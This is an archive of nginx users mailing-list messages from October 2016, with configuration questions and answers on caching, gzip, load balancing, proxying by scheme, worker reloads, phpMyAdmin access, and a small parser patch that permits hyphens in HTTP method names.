-- 
Francis Daly        francis at daoine.org

From francis at daoine.org Wed Oct 5 06:55:23 2016
From: francis at daoine.org (Francis Daly)
Date: Wed, 5 Oct 2016 07:55:23 +0100
Subject: location query string?
In-Reply-To:
References: <20160929213233.GE11677@daoine.org> <20161002100709.GH11677@daoine.org>
Message-ID: <20161005065523.GN11677@daoine.org>

On Tue, Oct 04, 2016 at 10:12:07AM -0700, Grant wrote:

Hi there,

> > Your later mail suggests that "Keepalive" is involved somehow. If you
> > are still keen to investigate -- can you see that nginx does something
> > wrong when Keepalive is or is not set? Or does upstream do something
> > wrong when Keepalive is or is not set? (If there is an nginx problem,
> > I suspect that people will be interested in fixing it. If there is an
> > upstream problem, then possibly people there will be interested in fixing
> > it, or possibly a workaround can be provided on the nginx side.)
>
> Admittedly this is over my head. I would be happy to test and probe
> if anyone is interested enough to tell me what to do.

I'm guessing quite a bit here, but it sounds like there may be an issue where your nginx believes it makes an http request to upstream without http-keepalive (HTTP/1.0 without Connection:, or with "Connection: close"), but your upstream processes it as if it had http-keepalive set; and so upstream does not close the tcp connection after it thinks it has completed the http response.

In that case, if the response did not have Content-Length set and did not use chunked transfer encoding, then nginx would not know that the http response was complete and would keep waiting for more input.

(That would be unusual, since the client is nginx and the upstream is apache, and both are usually reasonable at handling http. Maybe your specific configuration matters.)

If you have a reproducible test case, where you make *this* request and the problem manifests itself *that* way, then you have a chance of making changes and testing them and seeing if the problem goes away. If you do not, then it is mostly blind debugging.

If you can identify one request/response that is part of the problem, then "tcpdump" or something to see what traffic passes during that request may be useful.

But so far, no-one else can reproduce the problem, and I am not sure what the problem actually is. So there is not a recipe of "do exactly this, then exactly that", I'm afraid.

f
-- 
Francis Daly        francis at daoine.org

From brentgclarklist at gmail.com Wed Oct 5 08:39:36 2016
From: brentgclarklist at gmail.com (Brent Clark)
Date: Wed, 5 Oct 2016 10:39:36 +0200
Subject: Nginx won't cache woff
Message-ID:

Good day Guys

I'm struggling to get nginx to cache woff and woff2 files. It would appear the particular wordpress theme is set to not cache, but I would like to override that. Nothing I do seems to work.

If someone could please review my work it would be appreciated.
bclark at bclark:~$ curl -I http://$REMOVEDDOMAIN/wp-content/themes/REMOVED-v5-2/fonts/adelle_bold-webfont.woff
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2016 08:28:31 GMT
Content-Type: application/font-woff
Content-Length: 41160
Connection: keep-alive
Last-Modified: Sun, 01 Nov 2015 15:02:55 GMT
ETag: "a0c8-5237bf49e7739"
Expires: Wed, 05 Oct 2016 09:28:31 GMT
Vary: User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.4.1
Cache-Control: max-age=3600
X-Cache-Status: MISS
Accept-Ranges: bytes

Here is my code: http://pastebin.com/RAVKYipU

Kind Regards
Brent Clark

From nginx-forum at forum.nginx.org Wed Oct 5 10:29:13 2016
From: nginx-forum at forum.nginx.org (sobuz)
Date: Wed, 05 Oct 2016 06:29:13 -0400
Subject: Why does nginx always send content encoding as gzip
Message-ID: <0f2e356162c3d54170259f2df1e485b9.NginxMailingListEnglish@forum.nginx.org>

I have set gzip to off:

user nginx;
worker_processes 1;

error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;

events {
    worker_connections 1024;
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    log_format main '$remote_addr - $remote_user [$time_local] "$request" '
                    '$status $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"';

    access_log /var/log/nginx/access.log main;

    sendfile on;
    #tcp_nopush on;

    keepalive_timeout 65;

    gzip off;

    include /etc/nginx/conf.d/*.conf;
}

I checked that it is not set anywhere else:

cd /etc/nginx/
grep -R gzip .
./nginx.conf: gzip off;

service nginx restart

Yet content is still getting sent as gzip:

Response Headers
Connection:keep-alive
Content-Encoding:gzip
Content-Length:51
Content-Type:application/json; charset=utf-8
Date:Wed, 05 Oct 2016 10:00:00 GMT
Server:nginx/1.6.2
Vary:Accept-Encoding

Any ideas how to turn gzip off completely?

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270070,270070#msg-270070

From jsharan15 at gmail.com Wed Oct 5 10:59:34 2016
From: jsharan15 at gmail.com (Sharan J)
Date: Wed, 5 Oct 2016 16:29:34 +0530
Subject: Nginx old worker process not exiting on reload
Message-ID:

Hi,

While reloading nginx, sometimes old worker processes are not exiting, thereby entering an "uninterruptible sleep" state. Is there a way to kill such abandoned worker processes? How can this be avoided?

We are using nginx-1.10.1.

Thanks,
Santhakumari.V

From philip.walenta at gmail.com Wed Oct 5 11:05:13 2016
From: philip.walenta at gmail.com (Philip Walenta)
Date: Wed, 5 Oct 2016 06:05:13 -0500
Subject: Nginx old worker process not exiting on reload
In-Reply-To:
References:
Message-ID: <74BB23D7-FF1F-460D-8543-31BEC864C2D3@gmail.com>

The only thing I ever experienced that would hold an old worker process open after a restart (in my case a config reload) was websocket connections.

Sent from my iPhone

> On Oct 5, 2016, at 5:59 AM, Sharan J wrote:
>
> Hi,
>
> While reloading nginx, sometimes old worker processes are not exiting,
> thereby entering an "uninterruptible sleep" state. Is there a way to kill
> such abandoned worker processes? How can this be avoided?
> We are using nginx-1.10.1.
>
> Thanks,
> Santhakumari.V

From eric.cox at kroger.com Wed Oct 5 11:07:04 2016
From: eric.cox at kroger.com (Cox, Eric S)
Date: Wed, 5 Oct 2016 11:07:04 +0000
Subject: Use individual upstream server name as host header
Message-ID: <74A4D440E25E6843BC8E324E67BB3E39454EEEDB@N060XBOXP38.kroger.com>

Is anyone aware of a way to pass the upstream server name as the host header per individual server, instead of setting it at the location level for all the upstream members? Without using a lua script, that is.

Thanks

From ru at nginx.com Wed Oct 5 11:50:39 2016
From: ru at nginx.com (Ruslan Ermilov)
Date: Wed, 5 Oct 2016 14:50:39 +0300
Subject: Use individual upstream server name as host header
In-Reply-To: <74A4D440E25E6843BC8E324E67BB3E39454EEEDB@N060XBOXP38.kroger.com>
References: <74A4D440E25E6843BC8E324E67BB3E39454EEEDB@N060XBOXP38.kroger.com>
Message-ID: <20161005115039.GB5760@lo0.su>

On Wed, Oct 05, 2016 at 11:07:04AM +0000, Cox, Eric S wrote:
> Is anyone aware of a way to pass the upstream server name as the host header
> per individual server, instead of setting it at the location level for all
> the upstream members? Without using a lua script, that is.

This is currently impossible.

From nginx-forum at forum.nginx.org Wed Oct 5 12:10:10 2016
From: nginx-forum at forum.nginx.org (anish10dec)
Date: Wed, 05 Oct 2016 08:10:10 -0400
Subject: Uneven High Load on the Nginx Server
In-Reply-To: <20160927175737.GL73038@mdounin.ru>
References: <20160927175737.GL73038@mdounin.ru>
Message-ID: <33b1f21ad745b46345732332e961dd27.NginxMailingListEnglish@forum.nginx.org>

On some of the servers, Waiting is increasing in an uneven way. For example, with a set of 3 servers, Active connections is around 6K on all of them, but Writing on two of the servers is around 500-600 while on the third it is 3000. On this server the response time for delivering the content is increasing. This happens even if the content is served from nginx's cache.

Is some parameter in Nginx causing this? On stopping Nginx, the same behaviour shifts to one of the other two.
This is the Nginx conf we are using. The server has 60 CPU cores with 1.5 TB of RAM. PFB part of the nginx.conf of the server with the issue:

worker_processes auto;

events {
    worker_connections 4096;
    use epoll;
    multi_accept on;
}

worker_rlimit_nofile 100001;

http {
    include mime.types;
    default_type video/mp4;

    proxy_buffering on;
    proxy_buffer_size 4096k;
    proxy_buffers 5 4096k;

    sendfile on;
    keepalive_timeout 30;
    keepalive_requests 60000;
    send_timeout 10;
    tcp_nodelay on;
    tcp_nopush on;
    reset_timedout_connection on;
    gzip off;
    server_tokens off;

Regards,
Anish

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,269874,270077#msg-270077

From r at roze.lv Wed Oct 5 12:40:42 2016
From: r at roze.lv (Reinis Rozitis)
Date: Wed, 5 Oct 2016 15:40:42 +0300
Subject: Uneven High Load on the Nginx Server
In-Reply-To: <33b1f21ad745b46345732332e961dd27.NginxMailingListEnglish@forum.nginx.org>
References: <20160927175737.GL73038@mdounin.ru> <33b1f21ad745b46345732332e961dd27.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <4C0AE5ACAD6349B994224759F6756832@MasterPC>

> On some of the servers, Waiting is increasing in an uneven way. For example,
> with a set of 3 servers, Active connections is around 6K on all of them,
> but Writing on two of the servers is around 500-600 while on the third it
> is 3000.
> On stopping Nginx, the same behaviour shifts to one of the other two.

What do you use to distribute the load/requests between the set of servers?

Without knowing any other details/metrics, this would just indicate that the balancing mechanism/solution doesn't do the job the way you would expect. Just as an example: a simple dns roundrobin, while working fine in the long term (the requests are distributed somewhat evenly), still puts a (bit) higher load on the first entry/server.

rr

From nginx-forum at forum.nginx.org Wed Oct 5 12:51:41 2016
From: nginx-forum at forum.nginx.org (anish10dec)
Date: Wed, 05 Oct 2016 08:51:41 -0400
Subject: Uneven High Load on the Nginx Server
In-Reply-To: <4C0AE5ACAD6349B994224759F6756832@MasterPC>
References: <4C0AE5ACAD6349B994224759F6756832@MasterPC>
Message-ID: <2da49a7942cafac07cd2eb5550dd8985.NginxMailingListEnglish@forum.nginx.org>

We are using Haproxy to distribute the load on the servers. Load is distributed on the basis of the URI, with the parameter set in the haproxy config as "balance uri". This has been done to achieve the maximum cache hit rate from the servers.

Does the high number of Writing lead to an increase in response time for delivering the content?

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,269874,270080#msg-270080

From anoopalias01 at gmail.com Wed Oct 5 13:04:06 2016
From: anoopalias01 at gmail.com (Anoop Alias)
Date: Wed, 5 Oct 2016 18:34:06 +0530
Subject: proxying to upstream port based on scheme
Message-ID:

I have an httpd upstream server that listens on both http and https on different ports, and I want to send all http => http_upstream and https => https_upstream.

The following does the trick:

#####################
if ( $scheme = https ) {
    set $port 4430;
}
if ( $scheme = http ) {
    set $port 9999;
}

location / {
    proxy_pass $scheme://127.0.0.1:$port;
}
#####################

Just wanted to know if this is much less efficient (if being evil) than hard-coding the port and having two different server{} blocks for http and https.

Thanks in advance.

-- 
*Anoop P Alias*
From r at roze.lv Wed Oct 5 13:08:13 2016
From: r at roze.lv (Reinis Rozitis)
Date: Wed, 5 Oct 2016 16:08:13 +0300
Subject: Uneven High Load on the Nginx Server
In-Reply-To: <2da49a7942cafac07cd2eb5550dd8985.NginxMailingListEnglish@forum.nginx.org>
References: <4C0AE5ACAD6349B994224759F6756832@MasterPC> <2da49a7942cafac07cd2eb5550dd8985.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

> Load is distributed on the basis of the URI, with the parameter set in the
> haproxy config as "balance uri".
> This has been done to achieve the maximum cache hit rate from the servers.

While the cache might be more efficient this way, it can lead to one server always serving some "hot" content while the others stay idle.

If you can afford to shrink the cache, you could try haproxy's leastconn mechanism. It will initially increase the load on the backends (the cache needs to be downloaded 3 times, if not configured to look up the neighbours first), but the load on the frontends should always be more or less even.

> Does the high number of Writing lead to an increase in response time for
> delivering the content?

Of course; it means that more clients are getting the data at the same time (more disk/network io etc).

rr

From francis at daoine.org Wed Oct 5 13:24:54 2016
From: francis at daoine.org (Francis Daly)
Date: Wed, 5 Oct 2016 14:24:54 +0100
Subject: Nginx won't cache woff
In-Reply-To:
References:
Message-ID: <20161005132454.GO11677@daoine.org>

On Wed, Oct 05, 2016 at 10:39:36AM +0200, Brent Clark wrote:

Hi there,

> I'm struggling to get nginx to cache woff and woff2 files.
>
> It would appear the particular wordpress theme is set to not cache,
> but I would like to override that.

> bclark at bclark:~$ curl -I
> http://$REMOVEDDOMAIN/wp-content/themes/REMOVED-v5-2/fonts/adelle_bold-webfont.woff

> Expires: Wed, 05 Oct 2016 09:28:31 GMT
> Vary: User-Agent
> Pragma: public
> Cache-Control: max-age=3600

> Here is my code: http://pastebin.com/RAVKYipU

For "woff", that has:

proxy_ignore_headers Cache-Control Vary Expires Set-Cookie X-Accel-Expires;
proxy_cache_valid 404 1m;

For "swf" it has:

proxy_ignore_headers Vary;
proxy_cache_valid 404 3m;

For how long do you want your "woff" content cached by nginx?

If it is a fixed amount, set proxy_cache_valid suitably.

If it is "whatever Cache-Control says", remove that from proxy_ignore_headers.

(Aside: it is usually friendlier to include the config in the email, so that someone next year will be able to see the complete question. It's possible that that pastebin link may not have the same content then as it does today.)

Cheers,

f
-- 
Francis Daly        francis at daoine.org

From nginx-forum at forum.nginx.org Wed Oct 5 13:30:00 2016
From: nginx-forum at forum.nginx.org (smaig)
Date: Wed, 05 Oct 2016 09:30:00 -0400
Subject: nginx worker process exited on signal 7
In-Reply-To: <20161003151313.GE73038@mdounin.ru>
References: <20161003151313.GE73038@mdounin.ru>
Message-ID:

Thanks Maxim, we'll try this.

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270043,270084#msg-270084

From nginx-forum at forum.nginx.org Wed Oct 5 13:42:28 2016
From: nginx-forum at forum.nginx.org (anish10dec)
Date: Wed, 05 Oct 2016 09:42:28 -0400
Subject: Uneven High Load on the Nginx Server
In-Reply-To:
References:
Message-ID: <881970201c39356c8b6dbfb42f8ce7c5.NginxMailingListEnglish@forum.nginx.org>

Actually, it's not the case that more clients are trying to get the content from one of the servers, as the server throughput shows equal load on all interfaces of the server, which is around 4 Gbps.
So should I expect Writing to increase with a higher number of Active connections? Is it that Nginx is not able to handle the load of that many connections, due to which requests go into Writing mode and Nginx does not release them?

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,269874,270085#msg-270085

From nginx-forum at forum.nginx.org Wed Oct 5 14:40:05 2016
From: nginx-forum at forum.nginx.org (nixcoder)
Date: Wed, 05 Oct 2016 10:40:05 -0400
Subject: 400 bad request for http m-post method
Message-ID: <5edc178411db579b66361f64b751ee26.NginxMailingListEnglish@forum.nginx.org>

Hi,

I'm getting the below error in an nginx reverse proxy server. It seems the proxy server does not recognize the http method "M-POST". Is there a way I can allow these incoming requests?

nginx.1 | xxxx.xxx.xxx 10.x.xx.x - - [05/Oct/2016:10:31:57 +0000] "M-POST /cimom HTTP/1.1" 400 166 "-" "-"
nginx.1 | xxxx.xxx.xxx 10.x.xx.x - - [05/Oct/2016:10:31:57 +0000] "M-POST /cimom HTTP/1.1" 400 166 "-" "-"

Thanks in advance.

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270087,270087#msg-270087

From mdounin at mdounin.ru Wed Oct 5 15:25:45 2016
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Wed, 5 Oct 2016 18:25:45 +0300
Subject: 400 bad request for http m-post method
In-Reply-To: <5edc178411db579b66361f64b751ee26.NginxMailingListEnglish@forum.nginx.org>
References: <5edc178411db579b66361f64b751ee26.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20161005152545.GU73038@mdounin.ru>

Hello!

On Wed, Oct 05, 2016 at 10:40:05AM -0400, nixcoder wrote:

> Hi,
> I'm getting the below error in an nginx reverse proxy server. It seems the
> proxy server does not recognize the http method "M-POST". Is there a way I
> can allow these incoming requests?
>
> nginx.1 | xxxx.xxx.xxx 10.x.xx.x - - [05/Oct/2016:10:31:57 +0000] "M-POST
> /cimom HTTP/1.1" 400 166 "-" "-"
> nginx.1 | xxxx.xxx.xxx 10.x.xx.x - - [05/Oct/2016:10:31:57 +0000] "M-POST
> /cimom HTTP/1.1" 400 166 "-" "-"

Only "A" .. "Z" and "_" are allowed in method names by nginx. If you want to allow "M-POST", please try the following patch:

# HG changeset patch
# User Maxim Dounin
# Date 1475681003 -10800
#      Wed Oct 05 18:23:23 2016 +0300
# Node ID fb39836bb3708b26629eaea06fe1221e39daa253
# Parent  9b9ae81cd4f01ed60e7bab323d49b470cec69d9e
Allowed '-' in method names.

It is used at least by SOAP (M-POST method, defined by RFC 2774) and
by WebDAV versioning (VERSION-CONTROL and BASELINE-CONTROL methods,
defined by RFC 3253).

diff --git a/src/http/ngx_http_parse.c b/src/http/ngx_http_parse.c
--- a/src/http/ngx_http_parse.c
+++ b/src/http/ngx_http_parse.c
@@ -149,7 +149,7 @@ ngx_http_parse_request_line(ngx_http_req
                 break;
             }

-            if ((ch < 'A' || ch > 'Z') && ch != '_') {
+            if ((ch < 'A' || ch > 'Z') && ch != '_' && ch != '-') {
                 return NGX_HTTP_PARSE_INVALID_METHOD;
             }

@@ -270,7 +270,7 @@ ngx_http_parse_request_line(ngx_http_req
                 break;
             }

-            if ((ch < 'A' || ch > 'Z') && ch != '_') {
+            if ((ch < 'A' || ch > 'Z') && ch != '_' && ch != '-') {
                 return NGX_HTTP_PARSE_INVALID_METHOD;
             }

-- 
Maxim Dounin
http://nginx.org/

From vbart at nginx.com Wed Oct 5 15:32:58 2016
From: vbart at nginx.com (Valentin V.
Bartenev)
Date: Wed, 05 Oct 2016 18:32:58 +0300
Subject: proxying to upstream port based on scheme
In-Reply-To:
References:
Message-ID: <6504454.EPfo57qKWK@vbart-workstation>

On Wednesday 05 October 2016 18:34:06 Anoop Alias wrote:
> I have an httpd upstream server that listens on both http and https on
> different ports, and I want to send all http => http_upstream and
> https => https_upstream.
>
> The following does the trick:
>
> [...]
>
> Just wanted to know if this is much less efficient (if being evil) than
> hard-coding the port and having two different server{} blocks for http
> and https.

Why not use map?

map $scheme $port {
    http    9999;
    https   4430;
}

proxy_pass $scheme://127.0.0.1:$port;

wbr, Valentin V. Bartenev

From me at myconan.net Wed Oct 5 15:36:21 2016
From: me at myconan.net (Edho Arief)
Date: Thu, 06 Oct 2016 00:36:21 +0900
Subject: proxying to upstream port based on scheme
In-Reply-To: <6504454.EPfo57qKWK@vbart-workstation>
References: <6504454.EPfo57qKWK@vbart-workstation>
Message-ID: <1475681781.1951403.746776561.6FD18030@webmail.messagingengine.com>

Hi,

On Thu, Oct 6, 2016, at 00:32, Valentin V. Bartenev wrote:
> Why not use map?
>
> map $scheme $port {
>     http    9999;
>     https   4430;
> }
>
> proxy_pass $scheme://127.0.0.1:$port;

... or two separate server blocks.
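For instance, a minimal sketch of that variant (the ports are taken from the earlier mail; the ssl certificate directives are omitted here):

server {
    listen 80;
    location / {
        proxy_pass http://127.0.0.1:9999;
    }
}

server {
    listen 443 ssl;
    # ssl_certificate / ssl_certificate_key would go here
    location / {
        proxy_pass https://127.0.0.1:4430;
    }
}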
But you could look at the haproxy status page and see if there aren't big differences in the currently active connections to the backends, and/or whether the "slow" backend doesn't have way more (completed) requests. Plainly comparing network interface throughput doesn't always indicate the work a server needs to do: you could saturate the 4 Gbps link by sending a single 100 GB file to a single client at ~500 MB/s, while at the same time another server could be serving 1 MB requests to 500 clients, or 50000 clients each downloading 10 KB -- and the resulting load could be very different.

rr

From nginx-forum at forum.nginx.org Thu Oct 6 04:28:36 2016 From: nginx-forum at forum.nginx.org (c0nw0nk) Date: Thu, 06 Oct 2016 00:28:36 -0400 Subject: Why does nginx always send content encoding as gzip In-Reply-To: <0f2e356162c3d54170259f2df1e485b9.NginxMailingListEnglish@forum.nginx.org> References: <0f2e356162c3d54170259f2df1e485b9.NginxMailingListEnglish@forum.nginx.org> Message-ID:

You should check your application -- it sounds like it is compressing its pages.

A simple test is this: create an empty HTML file and serve it from a location, then check the headers.

location = /test.html {
    root "path/to/html/file";
}

If the headers on that response show only the gzip compression set in your nginx config, then you know it's your web application doing the gzipping.

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270070,270096#msg-270096

From nginx-forum at forum.nginx.org Thu Oct 6 07:59:38 2016 From: nginx-forum at forum.nginx.org (anish10dec) Date: Thu, 06 Oct 2016 03:59:38 -0400 Subject: Uneven High Load on the Nginx Server In-Reply-To: <017a01d21f36$ff9d0020$fed70060$@roze.lv> References: <017a01d21f36$ff9d0020$fed70060$@roze.lv> Message-ID: <118ad0c4aa4fd3c27c50e408362c94cf.NginxMailingListEnglish@forum.nginx.org>

> I reread your initial post and some other things don't seem right to
> me:
> - "We see that out of two server on which load is high i.e around 5",
> but later you write "Server is having 60 CPU Cores with 1.5 TB of RAM"
> - a load of 5 on a 60-core machine means the server is only at ~8%
> load, which isn't very high. Or is it a typo?

The load was mentioned in comparison with the other servers. On the servers where Writing is 500-600, the load is around 0.5-0.8, while on the problematic server where Writing is around 3000, the load is 5. So I totally agree with you that on a server with such a high configuration this load is minimal.

So it might not be the load as such, but the large number of connections in Writing that is increasing the response time, and with it the load.

> But you could look at the haproxy status page and see if there aren't
> big differences in the currently active connections to the backends,
> and/or whether the "slow" backend doesn't have way more (completed)
> requests.

Will look into the haproxy config and share the observation.

One more observation: over the day the Writing count remains balanced across all the servers, even though Active Connections stays at 10k to 11k. But at night, if the connections reach 6k to 7k, the Writing count varies across a different set of servers. Since at night there is a higher load on the network, with more users trying to access the videos/songs, is there any possibility that the network might be contributing to the high number of Writing connections on any one server? Can there be some issue on the network side?
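For context, the Active/Writing numbers discussed in this thread come from nginx's stub_status counters. A minimal sketch for exposing them, assuming ngx_http_stub_status_module is compiled in and /basic_status is an unused path:

location = /basic_status {
    stub_status;        # reports Active connections plus Reading/Writing/Waiting counts
    allow 127.0.0.1;    # restrict to the monitoring host
    deny  all;
}

A connection is counted as Writing while nginx is sending the response back to the client, so a persistently high Writing figure usually points at slow response delivery (slow clients, disk, or upstreams) rather than at connection acceptance.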
Posted at Nginx Forum: https://forum.nginx.org/read.php?2,269874,270097#msg-270097

From nginx-forum at forum.nginx.org Thu Oct 6 20:43:07 2016 From: nginx-forum at forum.nginx.org (ezak) Date: Thu, 06 Oct 2016 16:43:07 -0400 Subject: strange condition file not found nginx with php-fpm Message-ID:

I had been working with this config for 2 years without any problem. Suddenly I am facing a "not found" error message from nginx, and it comes only when the link has a "?", for example:

http://firmware.gem-flash.com/index.php?a=browse&b=category&id=1

If I open a normal link, it works:

http://firmware.gem-flash.com/index.php
http://firmware.gem-flash.com/[any other php file].php

Site config (user info changed):

server {
    listen *:80;
    server_name firmware.gem-flash.com;
    #error_log /var/log/nginx/firmware.gem-flash.com.log error;
    rewrite_log on;
    root /home/user/public_html/;

    location / {
        index index.php index.html index.htm;
    }

    location ~* ^.+\.(jpg|jpeg|gif|css|html|png|js|ico|bmp|zip|rar|txt|pdf|doc)$ {
        root /home/user/public_html/;
        # expires max;
        access_log off;
    }

    location ~ ^/.+\.php {
        fastcgi_pass 127.0.0.1:9000;
        fastcgi_index index.php;
        fastcgi_intercept_errors on;
        include /etc/nginx/fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param PATH_INFO $fastcgi_script_name;
    }
}

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270104,270104#msg-270104

From nginx-forum at forum.nginx.org Thu Oct 6 22:07:51 2016 From: nginx-forum at forum.nginx.org (mrast) Date: Thu, 06 Oct 2016 18:07:51 -0400 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx Message-ID:

I have an Ubuntu 16.04 server running LEMP with 4 websites on it:

website.com
website1.com
website2.com
website3.com

I have installed phpmyadmin and configured it, and it works fine; however, it serves all 4 websites. website1 and website3 do not need access to phpmyadmin.

How do I tell nginx to only load phpmyadmin for certain websites, please?

Thank you

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270105,270105#msg-270105

From philip.walenta at gmail.com Fri Oct 7 12:03:19 2016 From: philip.walenta at gmail.com (Philip Walenta) Date: Fri, 7 Oct 2016 07:03:19 -0500 Subject: Practical size limit of config files Message-ID:

Is there a practical maximum size limit for config files?

What is possible - 100k, 1MB, 10MB?

-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From mdounin at mdounin.ru Fri Oct 7 13:24:12 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Fri, 7 Oct 2016 16:24:12 +0300 Subject: Practical size limit of config files In-Reply-To: References: Message-ID: <20161007132411.GI73038@mdounin.ru>

Hello!

On Fri, Oct 07, 2016 at 07:03:19AM -0500, Philip Walenta wrote:

> Is there a practical maximum size limit for config files?
>
> What is possible - 100k, 1MB, 10MB?

I think this mostly depends on your ability as an administrator to manage such a configuration. I've worked with configurations larger than 10MB, though most of these megabytes were in geo{} and map{} bases managed separately.
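For illustration, such bases are usually kept in their own files and pulled in with "include" -- a minimal sketch with a hypothetical file path and variable name, not the actual bases referred to above:

# /etc/nginx/conf.d/networks.geo -- generated and managed by an external tool
geo $network_label {
    default          unknown;
    192.0.2.0/24     office;
    198.51.100.0/24  lab;
}

Then, inside the http{} context of the main file:

include /etc/nginx/conf.d/networks.geo;

This keeps the hand-edited configuration small while the bulky generated data lives in separate files.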
-- 
Maxim Dounin
http://nginx.org/

From francis at daoine.org Fri Oct 7 13:33:19 2016 From: francis at daoine.org (Francis Daly) Date: Fri, 7 Oct 2016 14:33:19 +0100 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: References: Message-ID: <20161007133319.GU11677@daoine.org>

On Thu, Oct 06, 2016 at 06:07:51PM -0400, mrast wrote:

Hi there,

> I have installed phpmyadmin and configured it, and it works fine;
> however, it serves all 4 websites.
>
> website1 and website3 do not need access to phpmyadmin.
>
> How do I tell nginx to only load phpmyadmin for certain websites, please?

Look at your config for the server{} block for website1. Find the piece that relates to phpmyadmin. Remove it.

The server{} block is identified by "server_name" including "website1". You can "find the piece" by looking at the "location" blocks that are defined, and learning one request that makes use of phpmyadmin, and seeing which one "location" handles that request -- http://nginx.org/r/location for details.

If it turns out that you only have one server{} block for all four websites, then it is probably simplest to copy-and-change it to two or four different blocks with different "server_name" values, and then remove the phpmyadmin part from the website1 and website3 block or blocks.

Good luck with it,

f
-- 
Francis Daly        francis at daoine.org

From nginx-forum at forum.nginx.org Fri Oct 7 14:20:51 2016 From: nginx-forum at forum.nginx.org (mrast) Date: Fri, 07 Oct 2016 10:20:51 -0400 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: <20161007133319.GU11677@daoine.org> References: <20161007133319.GU11677@daoine.org> Message-ID:

Hello Francis,

Thank you for your reply.

I have separate config files for each website in /etc/nginx/sites-enabled and have removed the default file.

I have this directive in /etc/nginx/nginx.conf:

##
# Virtual Host Configs
##
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;

server {
    listen 80 default_server;
    server_name _;
    return 444;
}

This is the start of my server block for website2, which I do want phpmyadmin access for:

server {
    server_name website.com www.website.com;

and the only phpmyadmin directive is for a pre-auth login box shown before the phpmyadmin login page displays:

location /phpmyadmin {
    auth_basic "Admin Login";
    auth_basic_user_file /etc/nginx/allow_phpmyadmin;
}

If I remove the /phpmyadmin section from website1's config file, it just removes the pre-auth login box and goes straight to the main phpmyadmin screen.

I have a symlink for nginx to use phpmyadmin: /usr/share/phpmyadmin /usr/share/nginx/html

I have a symlink in website2's and website4's directories for /usr/share/phpmyadmin. I don't have any symlinks in website1's and website3's directories for /usr/share/phpmyadmin - and yet these websites still serve /phpmyadmin.

I'm not sure what I need to remove after reading your reply - shall I remove the server_name line from the nginx.conf file?

Thank you

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270105,270117#msg-270117

From nginx-forum at forum.nginx.org Fri Oct 7 19:47:47 2016 From: nginx-forum at forum.nginx.org (yurai) Date: Fri, 07 Oct 2016 15:47:47 -0400 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <20161004194642.GK11677@daoine.org> References: <20161004194642.GK11677@daoine.org> Message-ID: <8260e5aeb7dcb440714376bc3d0f2d37.NginxMailingListEnglish@forum.nginx.org>

Hi Francis,

I added the return statement to my config as you suggested.
Now the config for backend s2 looks like:

server {
    listen 8080;
    server_name s2;

    location / {
        root /usr/share/nginx/html/foo/bar;
        return 200 "Do something sensible with $http_x_file\n";
        autoindex on;
    }
}

Unfortunately it still doesn't work as I expect - the upload.txt file content is not saved on the server side in /tmp/nginx-client-body. My understanding is that the transfer should be performed in 2 phases (2 POST requests via 2x curl). The first request should deliver the file name, and the second should deliver the actual file content, without involvement from the backend side. I analyzed the HTTP flow in wireshark and it looks fine to me (details below).

1. curl --data-binary upload.txt http://localhost/upload

- s1, listening on 80, receives a POST request with body = "upload.txt". s1 buffers "upload.txt" in /tmp/0000001, generates a new POST request with the field X-FILE="/tmp/0000001", and passes this request to the backend (s2)
- s2, listening on 8080, receives the POST request with X-FILE = "/tmp/0000001"
- s2 generates HTTP response 200 with body = "Do something sensible with /tmp/0000001\n" and passes it to s1
- s1 receives the above response and passes it to the client
- the client receives HTTP response 200 with body = "Do something sensible with /tmp/0000001\n"

2. curl --data-binary '@upload.txt' http://localhost/upload

If I understand this mechanism correctly, now the actual upload.txt transfer to the server, without backend involvement, should be triggered. So I should get response 200, and the upload.txt content should be saved by the server under /tmp/nginx-client-body. However, when I type curl --data-binary '@upload.txt' http://localhost/upload, the whole scenario from the previous point is performed again.

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270063,270122#msg-270122

From jsharan15 at gmail.com Sat Oct 8 05:34:52 2016 From: jsharan15 at gmail.com (Sharan J) Date: Sat, 8 Oct 2016 11:04:52 +0530 Subject: Nginx old worker process not exiting on reload In-Reply-To: <74BB23D7-FF1F-460D-8543-31BEC864C2D3@gmail.com> References: <74BB23D7-FF1F-460D-8543-31BEC864C2D3@gmail.com> Message-ID:

Hi,

Is there a way to prevent this? Is there any other way to kill such a process without the need for rebooting the machine?

Thanks,
Santhakumari

On Wed, Oct 5, 2016 at 4:35 PM, Philip Walenta wrote:
> The only thing I ever experienced that would hold an old worker process
> open after a restart (in my case config reload) were websocket connections.
>
> Sent from my iPhone
>
> > On Oct 5, 2016, at 5:59 AM, Sharan J wrote:
> >
> > Hi,
> >
> > While reloading nginx, sometimes old worker processes are not exiting,
> > thereby entering an "uninterruptible sleep" state. Is there a way to kill
> > such abandoned worker processes? How can this be avoided?
> > We are using nginx-1.10.1
> >
> > Thanks,
> > Santhakumari.V
> > _______________________________________________
> > nginx mailing list
> > nginx at nginx.org
